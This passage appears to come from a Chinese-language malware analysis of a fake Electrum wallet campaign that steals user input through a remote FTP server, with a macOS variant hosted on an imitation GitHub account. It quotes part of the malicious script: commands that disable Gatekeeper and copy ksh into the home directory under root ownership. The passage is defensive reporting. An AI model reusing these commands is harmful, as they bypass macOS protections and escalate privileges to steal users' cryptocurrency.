（11）网络行为

　　行为描述： 建立到一个指定的套接字连接

　　详情信息：

　　IP:**.138.40.**:128, SOCKET = 0x000001d0

　　IP:**.138.40.**:128, SOCKET = 0x000001cc

　　我们测试打开，自解压 :

　　结果发现用于上传本地用户信息的 FTP 账号密码，同时有一个正常的 Electrum Installer 文件，一旦用户安装后使用， 在 Electrum 下输入的敏感信息将被发送到远程恶意 FTP 服务器接收。

　　2020 年 06 月 02 日 开始，已经有用户陆续中招。

　　2.Mac 端

　　（1）安装命令：

　　（2）脚本内容：

　　（3）恶意地址：https://github.com/deep-onion

　　(模仿 知名项目 的 Github 地址 )

　　恶意地址下也有两个项目：

　　deep-onion.github.io

　　wallet

　　https://github.com/deep-onion/deep-onion.github.io

　　此文件此处不做分析。

　　（4） Mac 端

　　https://github.com/deep-onion/wallet

　　恶意文件是 DeepOnion

　　执行恶意脚本后是一系列恶意操作，

　　如：

　　try {   shell_exec("spctl --master-disable");   $ksh = trim(shell_exec("which ksh"));   shell_exec("cp $ksh $homedir/.ksh");   shell_exec("cd $homedir && chown root:wheel . (责任编辑：admin1)